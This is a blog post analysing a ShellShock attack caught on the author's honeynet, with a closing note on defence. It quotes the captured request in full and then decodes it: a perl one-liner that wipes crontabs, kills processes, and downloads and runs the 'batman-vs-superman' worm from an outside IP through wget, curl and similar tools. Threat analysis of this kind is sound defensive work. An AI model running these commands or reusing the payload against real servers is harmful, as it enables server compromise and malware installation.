Tailored Cyber Security.

Batman Vs Superman… the malware

I recently got my honeynet configured and running. The honeypots have been pulling in some pretty cool specimens. However, today I had something new pop up that I’ve never seen… on my honeynet manager. So, yay, they figured me out. Alas, their attack was unsuccessful… I think. Let’s get into it.

First, on April 29th there were 198 attempts to execute a perl script on my honeynet manager. They looked like this:

31.184.195.114 – – [29/Apr/2016:21:48:26 -0400] “GET /phppath/php-cgi HTTP/1.1” 404 209 “-” “() { :;};/usr/bin/perl -e ‘print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir bat-mobile ; cd /tmp/bat-mobile ; wget http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman ; lwp-download http://31.184.194.100/batman-vs-superman ; fetch http://31.184.194.100/batman-vs-superman ; curl -O http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman;cd /tmp/;rm -rf bat*\x22);'”

Let’s break that down to make a little sense of it. First field, is the source IP which is in Russia… http://geoiplookup.net/ip/31.184.195.114. I’m not trying to accuse Russia of doing this because the server I’m writing this on is in Canada while I’m not. On top of that, it’s primarily written in Portuguese along with some comments in English. Quite obviously, the next field is a time stamp to show when the activity occurred. Now, the rest of it is the real attack.

First off, this part “() { :;};” is a telltale sign of ShellShock. What it’s trying to do is kick off the exploit by sending this “magic string” to the server so that it executes perl. Now, as far as the perl goes…

/usr/bin/perl -e
print “Content-Type: text/plain\r\n\r\nXSUCCESS!”;
system(
“crontab -r;
killall -9 php perl;
cd /tmp/ ;
mkdir bat-mobile ;
cd /tmp/bat-mobile ;
wget http://31.184.194.100/batman-vs-superman ;
perl batman-vs-superman ;
lwp-download http://31.184.194.100/batman-vs-superman ;
fetch http://31.184.194.100/batman-vs-superman ;
curl -O http://31.184.194.100/batman-vs-superman ;
perl batman-vs-superman;
cd /tmp/;
rm -rf bat*”
);’

I’ve done some decoding for you. Simply, that big blob of attack is using PHP to launch the above “perl”script. I say “perl” because it just leverages the system call to execute bash commands. Either way, it deletes the current user’s crontab, terminates php and perl processes then magic ensues. Actually it’s not magic at all. They create a folder called bat-mobile in the tmp folder to store their malware. The malware cleverly named “batman-vs-superman” is downloaded (or attempted to) in a few ways then attempts to execute. Finally, it deletes everything it made and allows batman-vs-superman to run.

I won’t post batman-vs-superman here but I do have a copy of it. I maybe downloaded it using one of the lines from above. After some perusing through the code it looks like a new version of the Santy worm that’s been in circulation for over a decade. However, it appears to be beefed up pretty nicely. It connects to an IRC server that it uses for command and control.

It appears that the coder(s) utilized a couple of segments of code from around the internet. For example, one of the English portions I found was a verbatim copy-and-paste from an example unrelated to malware that I found on the internet. Long story short, it looks like a cool piece of code but I don’t think it’s anything special. Especially because it was shotgunned at my server almost 200 times in a second.

There have been a few more interesting attacks. It looks like “The Office of the President of Berkeley” has been sending shellcode at my server… please stop. Also, Michigan State is back at hitting my honeypots. Keep it up Spartans!

Bottom line:

Home users are safe. If you have a website then I really hope you’ve covered yourself since ShellShock, if not then get after it. There are a handful of spots to stop this attack before, during, and after infection. If you need specifics then feel free to contact me!

Leave a Reply